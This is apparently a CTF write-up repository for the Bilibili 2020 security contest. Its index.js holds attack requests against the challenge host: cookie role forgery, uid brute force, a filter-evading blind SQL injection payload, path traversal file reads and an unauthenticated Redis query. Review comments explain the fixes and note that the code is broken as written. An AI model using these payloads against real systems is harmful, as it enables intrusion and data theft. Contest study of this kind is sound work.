├── .gitignore ├── LICENSE ├── README.md ├── index.js ├── package-lock.json └── package.json /.gitignore: -------------------------------------------------------------------------------- 1 | node_modules -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2020 埋桑 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 
22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # bilibili-sec2020-writeup 2 | 哔哩哔哩2020年度安全挑战赛 - Writeup 3 | -------------------------------------------------------------------------------- /index.js: --------------------------------------------------------------------------------
// Solver script for the ten challenges of the contest named in README.md.
// Each funcN builds a `config` object holding the target URL, the request headers,
// a response handler and a request() method, then calls config.request().
const request = require("request");
const redis = require("redis");

// Fill in your own session value here. Every request below sends it in a Cookie
// header over plain http://.
let session = "";

// Challenge 1 - inspect the page source + inspect the requests.
// GETs /api/admin with a fixed User-Agent and the session cookie, and prints
// body.data as flag1 when the status is 200.
// NOTE(review): request() passes the bare identifier `callback`, but the handler is
// the method config.callback and no variable of that name is declared in this
// file, so the call throws a ReferenceError as written. func2, func3, func4, func5,
// func7 and func8 repeat the same pattern; func9 and func10 use this.callback.
const func1 = function () {
  const config = {
    url: "http://45.113.201.36/api/admin",
    headers: {
      "User-Agent": "bilibili Security Browser",
      Cookie: `session=${session}`,
    },
    // Prints the flag on a 200 response; errors and other statuses are ignored.
    callback(error, response, body) {
      if (!error && response.statusCode == 200) {
        console.log("flag1:", body.data);
      }
    },
    request() {
      request(
        {
          url: this.url,
          headers: this.headers,
          json: true, // parse the response body as JSON
        },
        callback
      );
    },
  };

  config.request();
};

// Challenge 2 - modify the User-Agent.
// Same request shape as func1 against /api/ctf/2.
// Per the author's note the endpoint keys on the User-Agent header; that header is
// chosen by the client, so it cannot serve as an access control.
const func2 = function () {
  const config = {
    url: "http://45.113.201.36/api/ctf/2",
    headers: {
      "User-Agent": "bilibili Security Browser",
      Cookie: `session=${session}`,
    },
    callback(error, response, body) {
      if (!error && response.statusCode == 200) {
        console.log("flag2:", body.data);
      }
    },
    request() {
      request(
        {
          url: this.url,
          headers: this.headers,
          json: true,
        },
        callback
      );
    },
  };

  config.request();
};

// Challenge 3 (the author gives no description).
// POSTs to /api/ctf/3 with a `role` cookie next to the session cookie.
// NOTE(review): `${this.role}` is evaluated while the object literal is being built,
// where `this` is func3's own `this` and not `config`, so config.role is not the
// value interpolated into the Cookie header. The same applies to the headers
// literals in func4, func5, func6, func7, func9 and func10.
const func3 = function () {
  const config = {
    url: "http://45.113.201.36/api/ctf/3",
    role: "ee11cbb19052e40b07aac0ca060c23ee", // looks like md5("user") - confirm
    headers: {
      "User-Agent": "bilibili Security Browser",
      Cookie: `role=${this.role}; session=${session};`,
    },
    callback(error, response, body) {
      if (!error && response.statusCode == 200) {
        console.log("flag3:", body.data);
      }
    },
    request() {
      request.post(
        {
          url: this.url,
          headers: this.headers,
          json: true,
        },
        callback
      );
    },
  };

  config.request();
};

// Challenge 4 - modify the `role` cookie.
// The weakness illustrated: the role travels in a client-side cookie as an unsalted
// MD5 of the role name, which any client can recompute. The role should be derived
// from server-side session state instead.
const func4 = function () {
  const config = {
    url: "http://45.113.201.36/api/ctf/4",
    role: "7b7bc2512ee1fedcd76bdc68926d4f7b", // i.e. the MD5 string of 'Administrator'; needs to be changed.
    headers: {
      "User-Agent": "bilibili Security Browser",
      Cookie: `role=${this.role}; session=${session};`,
    },
    callback(error, response, body) {
      if (!error && response.statusCode == 200) {
        console.log("flag4:", body.data);
      }
    },
    request() {
      request.post(
        {
          url: this.url,
          headers: this.headers,
          json: true,
        },
        callback
      );
    },
  };

  config.request();
};

// Challenge 5 - brute force.
// Intended flow: request /api/ctf/5?uid=N and, while the response carries no flag,
// increment the uid and ask again.
// Presumably the endpoint returns data for whichever uid is supplied; binding the
// uid to the authenticated session and rate-limiting would close this - confirm
// against the server.
// NOTE(review): `uid`, `url` and `headers` are used as bare identifiers inside the
// getter and the handler (not this.uid / this.url / this.headers), so they do not
// resolve to config's properties. The handler tests body.flag but prints body.data.
const func5 = function () {
  const config = {
    uid: 100336889, // starting uid
    get url() {
      return `http://45.113.201.36/api/ctf/5?uid=${uid}`;
    },
    role: "ee11cbb19052e40b07aac0ca060c23ee",
    headers: {
      "User-Agent": "bilibili Security Browser",
      Cookie: `role=${this.role}; session=${session};`,
    },
    callback(error, response, body) {
      if (!error && response.statusCode == 200) {
        if (body.flag === undefined) {
          // No flag for this uid: move on to the next one and re-issue the request.
          uid++;
          request.post(
            {
              url,
              headers,
              json: true,
            },
            this.callback
          );
        } else {
          console.log("flag5:", body.data);
          return;
        }
      }
    },
    request() {
      request(
        {
          url: this.url,
          headers: this.headers,
          json: true,
        },
        callback
      );
    },
  };

  config.request();
};

// Challenge 6 - SQL injection.
// request() tries to recover a value one character at a time (positions 1..100)
// with a binary search over character codes 33..128, using the response length as
// the true/false signal.
// The payload is sent in the Referer header, so presumably the server places that
// header into a SQL statement; every request header is untrusted input. The doubled
// keywords in the payload suggest the target strips SQL keywords in a single pass;
// parameterized queries, not keyword blocklists, are the fix.
// NOTE(review): as written this method does not complete. `url` and `flag` are bare
// identifiers rather than this.url / this.flag; `left` and `right` are only updated
// inside the asynchronous response handler, which cannot run while the synchronous
// `while` loop is executing; String.charCodeAt is not a static method of String.
// config.callback is never used by request() and logs the label "flag4:".
const func6 = function () {
  const config = {
    url: "http://45.113.201.36/blog/single.php?id=1",
    flag: "",
    role: "ee11cbb19052e40b07aac0ca060c23ee",
    headers: {
      "User-Agent": "bilibili Security Browser",
      Cookie: `role=${this.role}; session=${session};`,
    },
    callback(error, response, body) {
      if (!error && response.statusCode == 200) {
        console.log("flag4:", body.data);
      }
    },
    request() {
      for (let i = 1; i <= 100; i++) {
        // Search bounds for the character code at position i.
        let left = 33;
        let right = 128;

        while (right - left != 1) {
          let mid = Math.floor((left + right) / 2);
          // mid is interpolated as a hexadecimal string (toString(16)).
          let payload = `0123'^if(substr((selselectect flag from flag),${i},1)>binary ${mid.toString(
            16
          )},(selecselectt 1+~0),0) ununionion selecselectt 1,2#`;
          // Here `this` is config (request() is called as config.request()), so
          // this.role does resolve to config.role, unlike in the headers literal above.
          let headers = {
            Cookie: `role=${this.role}; session=${session};`,
            Referer: payload,
          };
          let callback = function (error, response, body) {
            if (!error && response.statusCode == 200) {
              // A body length of 5596 is treated as the "true" response; the value is
              // presumably specific to the target page.
              if (body.data.length == 5596) {
                left = mid;
              } else {
                right = mid;
              }
            }
          };
          request(
            {
              url,
              headers,
              json: true,
            },
            callback
          );
        }
        flag = String.charCodeAt(right);
      }
      console.log("flag6:", flag);
    },
  };

  config.request();
};

// Challenge 7 - arbitrary file read.
// The `file` query parameter of /api/images carries `../` segments that climb out
// of the image directory. The server side should resolve the requested path and
// reject anything that lands outside the intended base directory.
// NOTE(review): `url`, `headers` and `callback` are bare identifiers in request();
// the response handler has no body yet.
const func7 = function () {
  const config = {
    url: "http://45.113.201.36/api/images?file=../../../flag7.txt",
    role: "7b7bc2512ee1fedcd76bdc68926d4f7b",
    headers: {
      "User-Agent": "bilibili Security Browser",
      Cookie: `role=${this.role}; session=${session};`,
    },
    callback(error, response, body) {
      if (!error && response.statusCode == 200) {
        // File read
      }
    },
    request() {
      request(
        {
          url,
          headers,
          json: true,
        },
        callback
      );
    },
  };

  config.request();
};

// Challenge 8 - query Redis.
// Connects to port 6379 on the challenge host and reads the key "flag8". No
// password is passed to createClient, so the instance is presumably reachable
// without authentication; binding Redis to a private interface and requiring
// authentication addresses that.
// NOTE(review): `client` is a getter, so every read of this.client creates a new
// connection; the client that registers the "connect" listener is not the one that
// would run get(). connect() also passes the bare identifier `callback`.
const func8 = function () {
  const config = {
    get client() {
      return redis.createClient(6379, "45.113.201.36");
    },
    callback() {
      this.client.get("flag8", function (err, reply) {
        if (!err) {
          console.log(reply.toString());
        }
      });
    },
    connect() {
      this.client.on("connect", callback);
    },
  };

  config.connect();
};

// Challenge 9 - arbitrary file read + decryption with a key.
// Same /api/images traversal as func7, this time requesting secret.txt via POST.
// NOTE(review): the Cookie here interpolates this.session, whereas the other
// functions use the module-level `session` variable.
const func9 = function () {
  const config = {
    url: "http://45.113.201.36/api/images?file=../../../secret.txt",
    role: "ee11cbb19052e40b07aac0ca060c23ee",
    headers: {
      "User-Agent": "bilibili Security Browser",
      Cookie: `role=${this.role}; session=${this.session};`,
    },
    callback(error, response, body) {
      if (!error && response.statusCode == 200) {
        // Yields an encrypted string; decrypting it gives the flag
      }
    },
    request() {
      request.post(
        {
          url: this.url,
          headers: this.headers,
          json: true,
        },
        this.callback
      );
    },
  };

  config.request();
};

// Challenge 10 - Meta Type.
// POSTs to /blog/end.php with an array-style `id[]=` parameter and `url=flag.txt`.
const func10 = function () {
  const config = {
    // After running dirsearch, /blog/test.php was found to exist; it returns JS code
    // encoded with jsfuck, which decodes to
    //   var str1 = "程序员最多的地方"; var str2 = "bilibili1024havefun"; console.log()
    // (str1 reads "the place with the most programmers"). After finding the matching
    // repository on GitHub, this URL was obtained by following the hints there.
    url: "http://45.113.201.36/blog/end.php?id[]=&url=flag.txt",
    role: "ee11cbb19052e40b07aac0ca060c23ee",
    headers: {
      "User-Agent": "bilibili Security Browser",
      Cookie: `role=${this.role}; session=${session};`,
    },
    callback(error, response, body) {
      if (!error && response.statusCode == 200) {
        // Yields an encrypted string; decrypting it gives the flag
      }
    },
    request() {
      request.post(
        {
          url: this.url,
          headers: this.headers,
          json: true,
        },
        this.callback
      );
    },
  };

  config.request();
};

// Run every challenge in order.
// NOTE(review): the calls are synchronous, so the first function that throws stops
// the script before the later ones are reached.
func1();
func2();
func3();
func4();
func5();
func6();
func7();
func8();
func9();
func10();
-------------------------------------------------------------------------------- /package-lock.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "bilibili-sec2020-writeup", 3 | "version": "1.0.0", 4 | "lockfileVersion": 1, 5 | "requires": true, 6 | "dependencies": { 7 | "ajv": { 8 | "version": "6.12.6", 9 | "resolved": "https://registry.npm.taobao.org/ajv/download/ajv-6.12.6.tgz?cache=0&sync_timestamp=1603561543180&other_urls=https%3A%2F%2Fregistry.npm.taobao.org%2Fajv%2Fdownload%2Fajv-6.12.6.tgz", 10 | "integrity": "sha1-uvWmLoArB9l3A0WG+MO69a3ybfQ=", 11 | "requires": { 12 | "fast-deep-equal": "^3.1.1", 13 | "fast-json-stable-stringify": "^2.0.0", 14 | "json-schema-traverse": "^0.4.1", 15 | "uri-js": "^4.2.2" 16 | } 17 | }, 18 | "asn1": { 19 | "version": "0.2.4", 20 | "resolved": "https://registry.npm.taobao.org/asn1/download/asn1-0.2.4.tgz", 21 | "integrity": "sha1-jSR136tVO7M+d7VOWeiAu4ziMTY=", 22 | "requires": { 23 | "safer-buffer": "~2.1.0" 24 | } 25 | }, 26 | "assert-plus": { 27 | "version": "1.0.0", 28 | "resolved": "https://registry.npm.taobao.org/assert-plus/download/assert-plus-1.0.0.tgz", 29 | "integrity": "sha1-8S4PPF13sLHN2RRpQuTpbB5N1SU=" 30 | }, 31 | "asynckit": { 32 | "version": "0.4.0", 33 | "resolved": "https://registry.npm.taobao.org/asynckit/download/asynckit-0.4.0.tgz", 34 | "integrity": "sha1-x57Zf380y48robyXkLzDZkdLS3k=" 35 | }, 36 | "aws-sign2": { 37 | "version": "0.7.0", 38 | "resolved": "https://registry.npm.taobao.org/aws-sign2/download/aws-sign2-0.7.0.tgz", 39 | "integrity": "sha1-tG6JCTSpWR8tL2+G1+ap8bP+dqg=" 40 | }, 41 | "aws4": { 42 | "version": "1.10.1", 43 | "resolved": "https://registry.npm.taobao.org/aws4/download/aws4-1.10.1.tgz?cache=0&sync_timestamp=1597236947743&other_urls=https%3A%2F%2Fregistry.npm.taobao.org%2Faws4%2Fdownload%2Faws4-1.10.1.tgz", 44 | "integrity": 
"sha1-4eguTz6Zniz9YbFhKA0WoRH4ZCg=" 45 | }, 46 | "bcrypt-pbkdf": { 47 | "version": "1.0.2", 48 | "resolved": "https://registry.npm.taobao.org/bcrypt-pbkdf/download/bcrypt-pbkdf-1.0.2.tgz", 49 | "integrity": "sha1-pDAdOJtqQ/m2f/PKEaP2Y342Dp4=", 50 | "requires": { 51 | "tweetnacl": "^0.14.3" 52 | } 53 | }, 54 | "caseless": { 55 | "version": "0.12.0", 56 | "resolved": "https://registry.npm.taobao.org/caseless/download/caseless-0.12.0.tgz", 57 | "integrity": "sha1-G2gcIf+EAzyCZUMJBolCDRhxUdw=" 58 | }, 59 | "combined-stream": { 60 | "version": "1.0.8", 61 | "resolved": "https://registry.npm.taobao.org/combined-stream/download/combined-stream-1.0.8.tgz", 62 | "integrity": "sha1-w9RaizT9cwYxoRCoolIGgrMdWn8=", 63 | "requires": { 64 | "delayed-stream": "~1.0.0" 65 | } 66 | }, 67 | "core-util-is": { 68 | "version": "1.0.2", 69 | "resolved": "https://registry.npm.taobao.org/core-util-is/download/core-util-is-1.0.2.tgz", 70 | "integrity": "sha1-tf1UIgqivFq1eqtxQMlAdUUDwac=" 71 | }, 72 | "dashdash": { 73 | "version": "1.14.1", 74 | "resolved": "https://registry.npm.taobao.org/dashdash/download/dashdash-1.14.1.tgz?cache=0&sync_timestamp=1601073714105&other_urls=https%3A%2F%2Fregistry.npm.taobao.org%2Fdashdash%2Fdownload%2Fdashdash-1.14.1.tgz", 75 | "integrity": "sha1-hTz6D3y+L+1d4gMmuN1YEDX24vA=", 76 | "requires": { 77 | "assert-plus": "^1.0.0" 78 | } 79 | }, 80 | "delayed-stream": { 81 | "version": "1.0.0", 82 | "resolved": "https://registry.npm.taobao.org/delayed-stream/download/delayed-stream-1.0.0.tgz", 83 | "integrity": "sha1-3zrhmayt+31ECqrgsp4icrJOxhk=" 84 | }, 85 | "denque": { 86 | "version": "1.4.1", 87 | "resolved": "https://registry.npm.taobao.org/denque/download/denque-1.4.1.tgz", 88 | "integrity": "sha1-Z0T/dkHBSMP4ppwwflEjXB9KN88=" 89 | }, 90 | "ecc-jsbn": { 91 | "version": "0.1.2", 92 | "resolved": "https://registry.npm.taobao.org/ecc-jsbn/download/ecc-jsbn-0.1.2.tgz", 93 | "integrity": "sha1-OoOpBOVDUyh4dMVkt1SThoSamMk=", 94 | "requires": { 95 | "jsbn": "~0.1.0", 
96 | "safer-buffer": "^2.1.0" 97 | } 98 | }, 99 | "extend": { 100 | "version": "3.0.2", 101 | "resolved": "https://registry.npm.taobao.org/extend/download/extend-3.0.2.tgz", 102 | "integrity": "sha1-+LETa0Bx+9jrFAr/hYsQGewpFfo=" 103 | }, 104 | "extsprintf": { 105 | "version": "1.3.0", 106 | "resolved": "https://registry.npm.taobao.org/extsprintf/download/extsprintf-1.3.0.tgz", 107 | "integrity": "sha1-lpGEQOMEGnpBT4xS48V06zw+HgU=" 108 | }, 109 | "fast-deep-equal": { 110 | "version": "3.1.3", 111 | "resolved": "https://registry.npm.taobao.org/fast-deep-equal/download/fast-deep-equal-3.1.3.tgz?cache=0&sync_timestamp=1591599604977&other_urls=https%3A%2F%2Fregistry.npm.taobao.org%2Ffast-deep-equal%2Fdownload%2Ffast-deep-equal-3.1.3.tgz", 112 | "integrity": "sha1-On1WtVnWy8PrUSMlJE5hmmXGxSU=" 113 | }, 114 | "fast-json-stable-stringify": { 115 | "version": "2.1.0", 116 | "resolved": "https://registry.npm.taobao.org/fast-json-stable-stringify/download/fast-json-stable-stringify-2.1.0.tgz", 117 | "integrity": "sha1-h0v2nG9ATCtdmcSBNBOZ/VWJJjM=" 118 | }, 119 | "forever-agent": { 120 | "version": "0.6.1", 121 | "resolved": "https://registry.npm.taobao.org/forever-agent/download/forever-agent-0.6.1.tgz", 122 | "integrity": "sha1-+8cfDEGt6zf5bFd60e1C2P2sypE=" 123 | }, 124 | "form-data": { 125 | "version": "2.3.3", 126 | "resolved": "https://registry.npm.taobao.org/form-data/download/form-data-2.3.3.tgz?cache=0&sync_timestamp=1589721949882&other_urls=https%3A%2F%2Fregistry.npm.taobao.org%2Fform-data%2Fdownload%2Fform-data-2.3.3.tgz", 127 | "integrity": "sha1-3M5SwF9kTymManq5Nr1yTO/786Y=", 128 | "requires": { 129 | "asynckit": "^0.4.0", 130 | "combined-stream": "^1.0.6", 131 | "mime-types": "^2.1.12" 132 | } 133 | }, 134 | "getpass": { 135 | "version": "0.1.7", 136 | "resolved": "https://registry.npm.taobao.org/getpass/download/getpass-0.1.7.tgz", 137 | "integrity": "sha1-Xv+OPmhNVprkyysSgmBOi6YhSfo=", 138 | "requires": { 139 | "assert-plus": "^1.0.0" 140 | } 141 | }, 142 | 
"har-schema": { 143 | "version": "2.0.0", 144 | "resolved": "https://registry.npm.taobao.org/har-schema/download/har-schema-2.0.0.tgz", 145 | "integrity": "sha1-qUwiJOvKwEeCoNkDVSHyRzW37JI=" 146 | }, 147 | "har-validator": { 148 | "version": "5.1.5", 149 | "resolved": "https://registry.npm.taobao.org/har-validator/download/har-validator-5.1.5.tgz?cache=0&sync_timestamp=1596082584903&other_urls=https%3A%2F%2Fregistry.npm.taobao.org%2Fhar-validator%2Fdownload%2Fhar-validator-5.1.5.tgz", 150 | "integrity": "sha1-HwgDufjLIMD6E4It8ezds2veHv0=", 151 | "requires": { 152 | "ajv": "^6.12.3", 153 | "har-schema": "^2.0.0" 154 | } 155 | }, 156 | "http-signature": { 157 | "version": "1.2.0", 158 | "resolved": "https://registry.npm.taobao.org/http-signature/download/http-signature-1.2.0.tgz?cache=0&sync_timestamp=1600868555829&other_urls=https%3A%2F%2Fregistry.npm.taobao.org%2Fhttp-signature%2Fdownload%2Fhttp-signature-1.2.0.tgz", 159 | "integrity": "sha1-muzZJRFHcvPZW2WmCruPfBj7rOE=", 160 | "requires": { 161 | "assert-plus": "^1.0.0", 162 | "jsprim": "^1.2.2", 163 | "sshpk": "^1.7.0" 164 | } 165 | }, 166 | "is-typedarray": { 167 | "version": "1.0.0", 168 | "resolved": "https://registry.npm.taobao.org/is-typedarray/download/is-typedarray-1.0.0.tgz", 169 | "integrity": "sha1-5HnICFjfDBsR3dppQPlgEfzaSpo=" 170 | }, 171 | "isstream": { 172 | "version": "0.1.2", 173 | "resolved": "https://registry.npm.taobao.org/isstream/download/isstream-0.1.2.tgz", 174 | "integrity": "sha1-R+Y/evVa+m+S4VAOaQ64uFKcCZo=" 175 | }, 176 | "jsbn": { 177 | "version": "0.1.1", 178 | "resolved": "https://registry.npm.taobao.org/jsbn/download/jsbn-0.1.1.tgz", 179 | "integrity": "sha1-peZUwuWi3rXyAdls77yoDA7y9RM=" 180 | }, 181 | "json-schema": { 182 | "version": "0.2.3", 183 | "resolved": "https://registry.npm.taobao.org/json-schema/download/json-schema-0.2.3.tgz", 184 | "integrity": "sha1-tIDIkuWaLwWVTOcnvT8qTogvnhM=" 185 | }, 186 | "json-schema-traverse": { 187 | "version": "0.4.1", 188 | "resolved": 
"https://registry.npm.taobao.org/json-schema-traverse/download/json-schema-traverse-0.4.1.tgz?cache=0&sync_timestamp=1599333925809&other_urls=https%3A%2F%2Fregistry.npm.taobao.org%2Fjson-schema-traverse%2Fdownload%2Fjson-schema-traverse-0.4.1.tgz", 189 | "integrity": "sha1-afaofZUTq4u4/mO9sJecRI5oRmA=" 190 | }, 191 | "json-stringify-safe": { 192 | "version": "5.0.1", 193 | "resolved": "https://registry.npm.taobao.org/json-stringify-safe/download/json-stringify-safe-5.0.1.tgz", 194 | "integrity": "sha1-Epai1Y/UXxmg9s4B1lcB4sc1tus=" 195 | }, 196 | "jsprim": { 197 | "version": "1.4.1", 198 | "resolved": "https://registry.npm.taobao.org/jsprim/download/jsprim-1.4.1.tgz", 199 | "integrity": "sha1-MT5mvB5cwG5Di8G3SZwuXFastqI=", 200 | "requires": { 201 | "assert-plus": "1.0.0", 202 | "extsprintf": "1.3.0", 203 | "json-schema": "0.2.3", 204 | "verror": "1.10.0" 205 | } 206 | }, 207 | "mime-db": { 208 | "version": "1.44.0", 209 | "resolved": "https://registry.npm.taobao.org/mime-db/download/mime-db-1.44.0.tgz?cache=0&sync_timestamp=1600831159918&other_urls=https%3A%2F%2Fregistry.npm.taobao.org%2Fmime-db%2Fdownload%2Fmime-db-1.44.0.tgz", 210 | "integrity": "sha1-+hHF6wrKEzS0Izy01S8QxaYnL5I=" 211 | }, 212 | "mime-types": { 213 | "version": "2.1.27", 214 | "resolved": "https://registry.npm.taobao.org/mime-types/download/mime-types-2.1.27.tgz", 215 | "integrity": "sha1-R5SfmOJ56lMRn1ci4PNOUpvsAJ8=", 216 | "requires": { 217 | "mime-db": "1.44.0" 218 | } 219 | }, 220 | "oauth-sign": { 221 | "version": "0.9.0", 222 | "resolved": "https://registry.npm.taobao.org/oauth-sign/download/oauth-sign-0.9.0.tgz", 223 | "integrity": "sha1-R6ewFrqmi1+g7PPe4IqFxnmsZFU=" 224 | }, 225 | "performance-now": { 226 | "version": "2.1.0", 227 | "resolved": "https://registry.npm.taobao.org/performance-now/download/performance-now-2.1.0.tgz", 228 | "integrity": "sha1-Ywn04OX6kT7BxpMHrjZLSzd8nns=" 229 | }, 230 | "psl": { 231 | "version": "1.8.0", 232 | "resolved": 
"https://registry.npm.taobao.org/psl/download/psl-1.8.0.tgz", 233 | "integrity": "sha1-kyb4vPsBOtzABf3/BWrM4CDlHCQ=" 234 | }, 235 | "punycode": { 236 | "version": "2.1.1", 237 | "resolved": "https://registry.npm.taobao.org/punycode/download/punycode-2.1.1.tgz", 238 | "integrity": "sha1-tYsBCsQMIsVldhbI0sLALHv0eew=" 239 | }, 240 | "qs": { 241 | "version": "6.5.2", 242 | "resolved": "https://registry.npm.taobao.org/qs/download/qs-6.5.2.tgz", 243 | "integrity": "sha1-yzroBuh0BERYTvFUzo7pjUA/PjY=" 244 | }, 245 | "redis": { 246 | "version": "3.0.2", 247 | "resolved": "https://registry.npm.taobao.org/redis/download/redis-3.0.2.tgz", 248 | "integrity": "sha1-vUcGe4pKPmouVW5X9xzILHNgFQo=", 249 | "requires": { 250 | "denque": "^1.4.1", 251 | "redis-commands": "^1.5.0", 252 | "redis-errors": "^1.2.0", 253 | "redis-parser": "^3.0.0" 254 | } 255 | }, 256 | "redis-commands": { 257 | "version": "1.6.0", 258 | "resolved": "https://registry.npm.taobao.org/redis-commands/download/redis-commands-1.6.0.tgz", 259 | "integrity": "sha1-NtTKQq6e0pgVzbMK2fl5guuhziM=" 260 | }, 261 | "redis-errors": { 262 | "version": "1.2.0", 263 | "resolved": "https://registry.npm.taobao.org/redis-errors/download/redis-errors-1.2.0.tgz", 264 | "integrity": "sha1-62LSrbFeTq9GEMBK/hUpOEJQq60=" 265 | }, 266 | "redis-parser": { 267 | "version": "3.0.0", 268 | "resolved": "https://registry.npm.taobao.org/redis-parser/download/redis-parser-3.0.0.tgz", 269 | "integrity": "sha1-tm2CjNyv5rS4pCin3vTGvKwxyLQ=", 270 | "requires": { 271 | "redis-errors": "^1.0.0" 272 | } 273 | }, 274 | "request": { 275 | "version": "2.88.2", 276 | "resolved": "https://registry.npm.taobao.org/request/download/request-2.88.2.tgz", 277 | "integrity": "sha1-1zyRhzHLWofaBH4gcjQUb2ZNErM=", 278 | "requires": { 279 | "aws-sign2": "~0.7.0", 280 | "aws4": "^1.8.0", 281 | "caseless": "~0.12.0", 282 | "combined-stream": "~1.0.6", 283 | "extend": "~3.0.2", 284 | "forever-agent": "~0.6.1", 285 | "form-data": "~2.3.2", 286 | "har-validator": 
"~5.1.3", 287 | "http-signature": "~1.2.0", 288 | "is-typedarray": "~1.0.0", 289 | "isstream": "~0.1.2", 290 | "json-stringify-safe": "~5.0.1", 291 | "mime-types": "~2.1.19", 292 | "oauth-sign": "~0.9.0", 293 | "performance-now": "^2.1.0", 294 | "qs": "~6.5.2", 295 | "safe-buffer": "^5.1.2", 296 | "tough-cookie": "~2.5.0", 297 | "tunnel-agent": "^0.6.0", 298 | "uuid": "^3.3.2" 299 | } 300 | }, 301 | "safe-buffer": { 302 | "version": "5.2.1", 303 | "resolved": "https://registry.npm.taobao.org/safe-buffer/download/safe-buffer-5.2.1.tgz", 304 | "integrity": "sha1-Hq+fqb2x/dTsdfWPnNtOa3gn7sY=" 305 | }, 306 | "safer-buffer": { 307 | "version": "2.1.2", 308 | "resolved": "https://registry.npm.taobao.org/safer-buffer/download/safer-buffer-2.1.2.tgz", 309 | "integrity": "sha1-RPoWGwGHuVSd2Eu5GAL5vYOFzWo=" 310 | }, 311 | "sshpk": { 312 | "version": "1.16.1", 313 | "resolved": "https://registry.npm.taobao.org/sshpk/download/sshpk-1.16.1.tgz", 314 | "integrity": "sha1-+2YcC+8ps520B2nuOfpwCT1vaHc=", 315 | "requires": { 316 | "asn1": "~0.2.3", 317 | "assert-plus": "^1.0.0", 318 | "bcrypt-pbkdf": "^1.0.0", 319 | "dashdash": "^1.12.0", 320 | "ecc-jsbn": "~0.1.1", 321 | "getpass": "^0.1.1", 322 | "jsbn": "~0.1.0", 323 | "safer-buffer": "^2.0.2", 324 | "tweetnacl": "~0.14.0" 325 | } 326 | }, 327 | "tough-cookie": { 328 | "version": "2.5.0", 329 | "resolved": "https://registry.npm.taobao.org/tough-cookie/download/tough-cookie-2.5.0.tgz", 330 | "integrity": "sha1-zZ+yoKodWhK0c72fuW+j3P9lreI=", 331 | "requires": { 332 | "psl": "^1.1.28", 333 | "punycode": "^2.1.1" 334 | } 335 | }, 336 | "tunnel-agent": { 337 | "version": "0.6.0", 338 | "resolved": "https://registry.npm.taobao.org/tunnel-agent/download/tunnel-agent-0.6.0.tgz", 339 | "integrity": "sha1-J6XeoGs2sEoKmWZ3SykIaPD8QP0=", 340 | "requires": { 341 | "safe-buffer": "^5.0.1" 342 | } 343 | }, 344 | "tweetnacl": { 345 | "version": "0.14.5", 346 | "resolved": "https://registry.npm.taobao.org/tweetnacl/download/tweetnacl-0.14.5.tgz", 
347 | "integrity": "sha1-WuaBd/GS1EViadEIr6k/+HQ/T2Q=" 348 | }, 349 | "uri-js": { 350 | "version": "4.4.0", 351 | "resolved": "https://registry.npm.taobao.org/uri-js/download/uri-js-4.4.0.tgz", 352 | "integrity": "sha1-qnFCYd55PoqCNHp7zJznTobyhgI=", 353 | "requires": { 354 | "punycode": "^2.1.0" 355 | } 356 | }, 357 | "uuid": { 358 | "version": "3.4.0", 359 | "resolved": "https://registry.npm.taobao.org/uuid/download/uuid-3.4.0.tgz?cache=0&sync_timestamp=1601826526166&other_urls=https%3A%2F%2Fregistry.npm.taobao.org%2Fuuid%2Fdownload%2Fuuid-3.4.0.tgz", 360 | "integrity": "sha1-sj5DWK+oogL+ehAK8fX4g/AgB+4=" 361 | }, 362 | "verror": { 363 | "version": "1.10.0", 364 | "resolved": "https://registry.npm.taobao.org/verror/download/verror-1.10.0.tgz", 365 | "integrity": "sha1-OhBcoXBTr1XW4nDB+CiGguGNpAA=", 366 | "requires": { 367 | "assert-plus": "^1.0.0", 368 | "core-util-is": "1.0.2", 369 | "extsprintf": "^1.2.0" 370 | } 371 | } 372 | } 373 | } 374 | -------------------------------------------------------------------------------- /package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "bilibili-sec2020-writeup", 3 | "version": "1.0.0", 4 | "description": "哔哩哔哩2020年度安全挑战赛 - Writeup", 5 | "main": "index.js", 6 | "scripts": { 7 | "test": "echo \"Error: no test specified\" && exit 1" 8 | }, 9 | "keywords": [ 10 | "bilibili", 11 | "writeup", 12 | "web", 13 | "ctf", 14 | "sec" 15 | ], 16 | "author": "CNMathon ", 17 | "license": "MIT", 18 | "dependencies": { 19 | "redis": "^3.0.2", 20 | "request": "^2.88.2" 21 | } 22 | } 23 | --------------------------------------------------------------------------------